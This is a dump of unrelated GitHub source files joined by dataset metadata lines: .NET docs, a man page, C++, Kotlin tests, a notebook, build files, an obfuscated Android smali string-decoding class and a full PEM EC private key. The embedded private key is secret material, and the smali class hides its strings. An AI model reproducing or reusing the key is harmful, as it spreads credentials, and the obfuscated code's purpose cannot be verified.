<xref:System.Net.WebRequest.BeginGetRequestStream%2A> method starts an asynchronous request for the stream that is used to upload data to the server. The <xref:System.Net.WebRequest.EndGetRequestStream%2A> method completes the asynchronous request and returns the requested stream. These methods implement the **GetRequestStream** method using the standard .NET Framework asynchronous pattern. ## BeginGetResponse and EndGetResponse Methods The <xref:System.Net.WebRequest.BeginGetResponse%2A> method starts an asynchronous request to a server. The <xref:System.Net.WebRequest.EndGetResponse%2A> method completes the asynchronous request and returns the requested response. These methods implement the **GetResponse** method using the standard .NET Framework asynchronous pattern. ## GetRequestStream Method The <xref:System.Net.WebRequest.GetRequestStream%2A> method returns a stream that is used to write data to the requested server. The stream returned should be a write-only stream that does not seek; it is intended as a one-way stream of data that is written to the server. The stream returns false for the <xref:System.IO.Stream.CanRead%2A> and <xref:System.IO.Stream.CanSeek%2A> properties and true for the <xref:System.IO.Stream.CanWrite%2A> property. The **GetRequestStream** method typically opens a connection to the server and, before returning the stream, sends header information that indicates that data is being sent to the server. Because **GetRequestStream** begins the request, setting any **Header** properties or the **ContentLength** property is typically not allowed after calling **GetRequestStream**. ## GetResponse Method The <xref:System.Net.WebRequest.GetResponse%2A> method returns a protocol-specific descendant of the <xref:System.Net.WebResponse> class that represents the response from the server. Unless the request has already been initiated by the **GetRequestStream** method, the **GetResponse** method creates a connection to the resource identified by **RequestUri**, sends header information indicating the type of request being made, and then receives the response from the resource. Once the **GetResponse** method is called, all properties should be considered read-only. **WebRequest** instances are intended for one-time use; if you want to make another request, you should create a new **WebRequest**. The **GetResponse** method is responsible for creating an appropriate **WebResponse** descendant to contain the incoming response. ## See also - <xref:System.Net.WebRequest> - <xref:System.Net.HttpWebRequest> - <xref:System.Net.FileWebRequest> - [Programming Pluggable Protocols](programming-pluggable-protocols.md) - [Deriving from WebResponse](deriving-from-webresponse.md)
{ "pile_set_name": "Github" }
class TransactionMetric < Prosperity::Metric scope { Transaction } group_by :date aggregate { sum(:amount_in_cents) } end
{ "pile_set_name": "Github" }
.\" Process this file with .\" groff -man -Tascii tableslurp.1 .\" .TH TABLESLURP 1 "August 2015" .SH NAME tableslurp \- cassandra backup utility .SH SYNOPSIS .B tableslurp [-hp] [-k .I AWS_KEY .B ] [-s .I AWS_SECRET .B ] [--token .I AWS_TOKEN .B ] [-o .I OWNER .B ] [-g .I GROUP .B ] [-t .I THREADS .B ] [-f .I FILE .B ] [--force] [-n .I NAME .B ] .I bucket origin target .SH DESCRIPTION .B tableslurp This is the companion script to the .I tablesnap(1) program which you can use to restore files from an Amazon S3 bucket to a local directory which you have write permissions on. While the code is straightforward, the program assumes the files you are restoring were previously backed up with .I tablesnap(1) .SH OPTIONS .IP "-k, --aws-key=AWS_KEY" Amazon S3 Key (defaults to .B AWS_ACCESS_KEY_ID in environment) .IP "-s, --aws-secret=AWS_SECRET" Amazon S3 Secret (defaults to .B AWS_SECRET_ACCESS_KEY in environment) .IP "--token=AWS_SECURITY_TOKEN" Amazon S3 Token (defaults to .B AWS_SECURITY_TOKEN in environment) .IP "-p, --preserve" preserve permissions (if they exist) from the source. This overrides -o and -g .IP "-o OWNER, --owner=OWNER" after download, chown files to this user .IP "-g GROUP, --group=GROUP" after download, chgrp files to this group .IP "-t THREADS, --threads=THREADS" split the download between this many threads (default 4) .IP "-f FILE, --file=FILE" if specified, will download the fileset this file belongs to instead of the latest one available .IP "--force" force download of files even if they already exist locally .IP "-n NAME, --name=NAME" use this name instead of the FQDN to prefix the bucket directory .SH ENVIRONMENT .IP AWS_ACCESS_KEY_ID Amazon access key to be used if .B --aws-key is not specified .IP AWS_SECRET_ACCESS_KEY Amazon secret key to be used if .B --aws-secret is not specified .IP AWS_SECURITY_TOKEN Amazon security token to be used if .B --aws-token is not specified .IP TDEBUG If set, logs are emitted at the .I DEBUG level (default INFO) .IP USER Used to determine the default uid/gid to chown files after download .SH DIAGNOSTICS The following diagnostics may be issued on stderr: Could not parse stat metadata for .I filename .RS The JSON object downloaded from the bucket's "stat" key did not contain valid JSON .RE Cannot find anything to restore from .I PATH .RS No -listdir.json files were found in the bucket with the specified prefix and name. .RE Incomplete stat metadata for .I PATH will ignore .RS The JSON object downloaded from the bucket's "stat" key did not contain user and group keys. .RE Failed to download .I filename retrying .RS The S3 download failed, it will be retried up to 5 times. .SH BUGS Please report all bugs to the maintainers at https://github.com/JeremyGrosser/tablesnap/issues .SH AUTHORS Jeremy Grosser <[email protected]> Jorge A Gallegos <[email protected]> .SH "SEE ALSO" .BR tablechop (1), .BR tablesnap (1)
{ "pile_set_name": "Github" }
id: dsq-747515910 date: 2006-07-26T00:09:00.0000000-07:00 name: Dave Burke avatar: https://disqus.com/api/users/avatars/Dave Burke.jpg message: <p>Hey, Phil! We'll see about the future of "Code Available." I only know that the term "Open Source" doesn't seem to generate much harmonious dialog and agreement. :-)<br></p>
{ "pile_set_name": "Github" }
#include "../Base/Node.h" #include "PointLight.h" namespace tzw { class SpotLight : public PointLight { public: SpotLight(); vec3 dir() const; void setDir(const vec3 &dir); void tick(float dt); private: vec3 m_dir; }; } // namespace tzw
{ "pile_set_name": "Github" }
// Copyright David Abrahams 2001. // Distributed under the Boost Software License, Version 1.0. (See // accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) #ifndef CLASS_WRAPPER_DWA20011221_HPP # define CLASS_WRAPPER_DWA20011221_HPP # include <boost/python/to_python_converter.hpp> #ifndef BOOST_PYTHON_NO_PY_SIGNATURES # include <boost/python/converter/pytype_function.hpp> #endif # include <boost/ref.hpp> namespace boost { namespace python { namespace objects { // // These two classes adapt the static execute function of a class // MakeInstance execute() function returning a new PyObject* // reference. The first one is used for class copy constructors, and // the second one is used to handle smart pointers. // template <class Src, class MakeInstance> struct class_cref_wrapper : to_python_converter<Src,class_cref_wrapper<Src,MakeInstance> ,true> { static PyObject* convert(Src const& x) { return MakeInstance::execute(boost::ref(x)); } #ifndef BOOST_PYTHON_NO_PY_SIGNATURES static PyTypeObject const *get_pytype() { return converter::registered_pytype_direct<Src>::get_pytype(); } #endif }; template <class Src, class MakeInstance> struct class_value_wrapper : to_python_converter<Src,class_value_wrapper<Src,MakeInstance> ,true> { static PyObject* convert(Src x) { return MakeInstance::execute(x); } #ifndef BOOST_PYTHON_NO_PY_SIGNATURES static PyTypeObject const *get_pytype() { return MakeInstance::get_pytype(); } #endif }; }}} // namespace boost::python::objects #endif // CLASS_WRAPPER_DWA20011221_HPP
{ "pile_set_name": "Github" }
About ----- This allows verovio to be built as a native library for Android. It does not include any Java bindings. Build instructions ------------------ As a prerequisite you have to install the Android NDK. ``` export ANDROID_NDK_ROOT="/opt/Android/android-ndk-r21b" # adjust to NDK install ANDROID_NDK ndk_build=$ANDROID_NDK_ROOT/ndk-build cd jni $ndk_build ```
{ "pile_set_name": "Github" }
package de.westnordost.streetcomplete.quests import de.westnordost.streetcomplete.data.osm.changes.StringMapEntryAdd import de.westnordost.streetcomplete.data.osm.changes.StringMapEntryModify import de.westnordost.streetcomplete.mock import de.westnordost.streetcomplete.quests.max_speed.* import org.junit.Test class AddMaxSpeedTest { private val questType = AddMaxSpeed(mock()) @Test fun `apply no sign answer`() { questType.verifyAnswer( ImplicitMaxSpeed("XX", "flubberway"), StringMapEntryAdd("maxspeed:type", "XX:flubberway") ) } @Test fun `apply sign answer`() { questType.verifyAnswer( MaxSpeedSign(Kmh(123)), StringMapEntryAdd("maxspeed", "123"), StringMapEntryAdd("maxspeed:type", "sign") ) } @Test fun `apply mph sign answer`() { questType.verifyAnswer( MaxSpeedSign(Mph(123)), StringMapEntryAdd("maxspeed", "123 mph"), StringMapEntryAdd("maxspeed:type", "sign") ) } @Test fun `apply advisory sign answer`() { questType.verifyAnswer( AdvisorySpeedSign(Kmh(123)), StringMapEntryAdd("maxspeed:advisory", "123"), StringMapEntryAdd("maxspeed:type:advisory", "sign") ) } @Test fun `apply zone sign answer`() { questType.verifyAnswer( MaxSpeedZone(Kmh(123), "AA", "zoneXYZ"), StringMapEntryAdd("maxspeed", "123"), StringMapEntryAdd("maxspeed:type", "AA:zoneXYZ") ) } @Test fun `apply living street answer`() { questType.verifyAnswer( mapOf("highway" to "residential"), IsLivingStreet, StringMapEntryModify("highway", "residential", "living_street") ) } }
{ "pile_set_name": "Github" }
{ "cells": [ { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "def get_lr_metric(optimizer):\n", " def lr(y_true, y_pred):\n", " return optimizer.lr\n", " return lr" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "def initial_boost(epoch):\n", " if epoch==0: return float(8.0)\n", " elif epoch==1: return float(4.0)\n", " elif epoch==2: return float(2.0)\n", " elif epoch==3: return float(1.5)\n", " else: return float(1.0)" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "def step_cyclic(epoch):\n", " try:\n", " l_r, decay = 1.0, 0.0001\n", " if epoch%33==0:multiplier = 10\n", " else:multiplier = 1\n", " rate = float(multiplier * l_r * 1/(1 + decay * epoch))\n", " #print(\"Epoch\",epoch+1,\"- learning_rate\",rate)\n", " return rate\n", " except Exception as e:\n", " print(\"Error in lr_schedule:\",str(e))\n", " return float(1.0)" ] } ], "metadata": { "kernelspec": { "display_name": "Python 3", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.6.4" } }, "nbformat": 4, "nbformat_minor": 2 }
{ "pile_set_name": "Github" }
.class public Lcom/m/ac/aa; .super Ljava/lang/Object; # static fields .field public static final aa:Ljava/lang/String; .field public static final ab:Ljava/lang/String; .field public static final ac:Ljava/lang/String; .field public static final ad:Ljava/lang/String; .field public static final ae:Ljava/lang/String; .field public static final af:Ljava/lang/String; .field public static final ag:Ljava/lang/String; .field public static final ah:Ljava/lang/String; .field public static final ai:Ljava/lang/String; .field public static final aj:Ljava/lang/String; .field public static final ak:Ljava/lang/String; .field public static final al:Ljava/lang/String; .field public static final am:Ljava/lang/String; .field public static final an:Ljava/lang/String; .field public static final ao:Ljava/lang/String; .field public static final ap:Ljava/lang/String; .field public static final aq:Ljava/lang/String; .field public static final ar:Ljava/lang/String; .field public static final as:Ljava/lang/String; .field public static final at:Ljava/lang/String; .field public static final au:Ljava/lang/String; .field public static final av:Ljava/lang/String; .field public static final aw:Ljava/lang/String; .field public static final ax:Ljava/lang/String; .field public static final ay:Ljava/lang/String; .field public static final az:Ljava/lang/String; .field public static final ba:Ljava/lang/String; .field public static final bb:Ljava/lang/String; .field public static final bc:Ljava/lang/String; .field public static final bd:Ljava/lang/String; .field public static final be:Ljava/lang/String; .field public static final bf:Ljava/lang/String; .field public static final bg:Ljava/lang/String; .field public static final bh:Ljava/lang/String; .field public static final bi:Ljava/lang/String; .field public static final bj:Ljava/lang/String; .field public static final bk:Ljava/lang/String; .field public static final bl:Ljava/lang/String; .field public static final bm:Ljava/lang/String; .field public static final bn:Ljava/lang/String; .field public static final bo:Ljava/lang/String; .field public static final bp:Ljava/lang/String; .field public static final bq:Ljava/lang/String; .field public static final br:Ljava/lang/String; .field public static final bs:Ljava/lang/String; .field public static final bt:Ljava/lang/String; .field public static final bu:Ljava/lang/String; .field public static final bv:Ljava/lang/String; .field public static final bw:Ljava/lang/String; .field public static final bx:Ljava/lang/String; .field public static final by:Ljava/lang/String; .field public static final bz:Ljava/lang/String; .field public static final ca:Ljava/lang/String; .field public static final cb:I .field public static final cc:Ljava/lang/String; .field public static final cd:Ljava/lang/String; .field public static final ce:Ljava/lang/String; .field public static final cf:Ljava/lang/String; .field public static final cg:Ljava/lang/String; .field public static final ch:Ljava/lang/String; .field public static final ci:Ljava/lang/String; .field public static final cj:Ljava/lang/String; .field public static final ck:Ljava/lang/String; .field public static final cl:Ljava/lang/String; .field public static final cm:Ljava/lang/String; # direct methods .method static constructor <clinit>()V .locals 1 sget-object v0, Lcom/m/u/ac;->aa:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->aa:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ab:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ab:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ac:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ac:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ad:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ad:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ae:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ae:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->af:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->af:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ag:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ag:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ah:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ah:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ai:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ai:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->aj:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->aj:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ak:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ak:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->al:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->al:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->am:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->am:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->an:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->an:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ao:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ao:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ap:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ap:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->aq:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->aq:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ar:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ar:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->as:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->as:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->at:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->at:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->au:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->au:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->av:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->av:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ax:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->aw:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ay:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ax:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->az:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ay:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ba:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->az:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bb:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ba:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bj:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bb:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bk:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bc:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bl:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bd:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bm:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->be:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bn:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bf:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bo:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bg:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bp:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bh:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bq:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bi:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->br:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bj:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->f:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bk:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->g:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bl:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->h:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bm:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->i:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bn:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->j:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bo:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cg:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bp:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ch:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bq:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ci:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->br:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cj:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bs:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ck:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bt:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cl:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bu:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cm:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bv:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cn:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bw:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->co:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bx:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cp:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->by:Ljava/lang/String; invoke-static {}, Landroid/os/Environment;->getExternalStorageDirectory()Ljava/io/File; move-result-object v0 invoke-virtual {v0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bz:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->dn:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ca:Ljava/lang/String; invoke-static {}, Lcom/m/ac/aa;->aa()I move-result v0 sput v0, Lcom/m/ac/aa;->cb:I sget-object v0, Lcom/m/u/ac;->k:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cc:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->l:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cd:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->m:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ce:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->n:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cf:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->o:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cg:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->p:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ch:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->q:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ci:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->r:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cj:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->s:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ck:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->t:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cl:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->u:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cm:Ljava/lang/String; return-void .end method .method private static aa()I .locals 1 invoke-static {}, Lcom/m/u/ah;->aa()Lcom/m/u/ah; move-result-object v0 invoke-virtual {v0}, Lcom/m/u/ah;->ac()Z move-result v0 if-eqz v0, :cond_0 const/4 v0, 0x1 :goto_0 return v0 :cond_0 const/16 v0, 0x1e goto :goto_0 .end method
{ "pile_set_name": "Github" }
# This blacklist should be applied when LLVM is built # with -fsanitize=undefined instrumentation. It exists # because libstdc++ has some undefined behavior issues # in some of the headers, in particular, stl_tree.h. # upcast of address with insufficient space for an object of type std::_Rb_tree_node<...> src:*bits/stl_tree.h # libstdc++ 4.8 creates a null reference when calling # data() on an empty vector: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=59829 src:*bits/stl_iterator.h src:*bits/stl_vector.h # These auto-generated functions compile down to ~50k basic blocks with inlining # and UBSan enabled, causing long builds that lead to bot timeouts. # https://bugs.llvm.org/show_bug.cgi?id=37929 fun:*AArch64*InstPrinter*printAliasInstr*
{ "pile_set_name": "Github" }
<%# Copyright (C) The Arvados Authors. All rights reserved. SPDX-License-Identifier: AGPL-3.0 %> <% content_for :tab_line_buttons do %> <div class="input-group"> <input type="text" class="form-control filterable-control recent-pipeline-instances-filterable-control" placeholder="Search pipeline instances" data-filterable-target="#recent-pipeline-instances" <%# Just for the double-load test in FilterableInfiniteScrollTest: %> value="<%= params[:search] %>" /> </div> <%= form_tag({action: 'compare', controller: params[:controller], method: 'get'}, {method: 'get', id: 'compare', class: 'pull-right small-form-margin'}) do |f| %> <%= submit_tag 'Compare 2 or 3 selected', {class: 'btn btn-primary', disabled: true} %> <% end rescue nil %> <% end %> <%= render file: 'application/index.html.erb', locals: local_assigns %>
{ "pile_set_name": "Github" }
<Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <OutputType>Exe</OutputType> <TargetFramework>netcoreapp3.0</TargetFramework> <Nullable>enable</Nullable> </PropertyGroup> <ItemGroup> <PackageReference Include="Microsoft.Extensions.Configuration.Json" Version="3.0.0" /> <PackageReference Include="Microsoft.Extensions.DependencyInjection" Version="3.0.0" /> <PackageReference Include="Microsoft.Extensions.Hosting" Version="3.0.0" /> <PackageReference Include="Microsoft.Extensions.Options" Version="3.0.0" /> <PackageReference Include="Microsoft.Extensions.Options.ConfigurationExtensions" Version="3.0.0" /> </ItemGroup> <ItemGroup> <None Update="appsettings.json"> <CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory> </None> </ItemGroup> </Project>
{ "pile_set_name": "Github" }
-----BEGIN PRIVATE KEY----- MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgSB2awBKFfwQXSKYq O1b9QwlKdVzg8FAf5MBQ6s/0T7+hRANCAAR9bXAk4NDrb91L5/wSfkv7RrnNkKcV fcngncUN7iw/ThzruSv2qAbskWUPDbaoFQA7iVP799K7eKsADUIEBUbJ -----END PRIVATE KEY-----
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.company</groupId> <artifactId>x-manerger-sys-common-sms</artifactId> <version>0.0.1-SNAPSHOT</version> <packaging>jar</packaging> <name>x-manerger-sys-common-sms</name> <description>Demo project for Spring Boot</description> <!--<parent>--> <!--<groupId>org.springframework.boot</groupId>--> <!--<artifactId>spring-boot-starter-parent</artifactId>--> <!--<version>2.1.0.RELEASE</version>--> <!--<relativePath/> &lt;!&ndash; lookup parent from repository &ndash;&gt;--> <!--</parent>--> <parent> <groupId>com.company</groupId> <artifactId>x-manerger-sys-common</artifactId> <version>0.0.1-SNAPSHOT</version> <!--<relativePath/> &lt;!&ndash; lookup parent from repository &ndash;&gt;--> </parent> <properties> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding> <java.version>1.8</java.version> <!-- 并发框架Disruptor --> <disruptor.version>3.3.6</disruptor.version> <dom4j.version>1.6.1</dom4j.version> <beetl.version>1.1.55.RELEASE</beetl.version> </properties> <dependencies> <!--<dependency>--> <!--<groupId>org.springframework.boot</groupId>--> 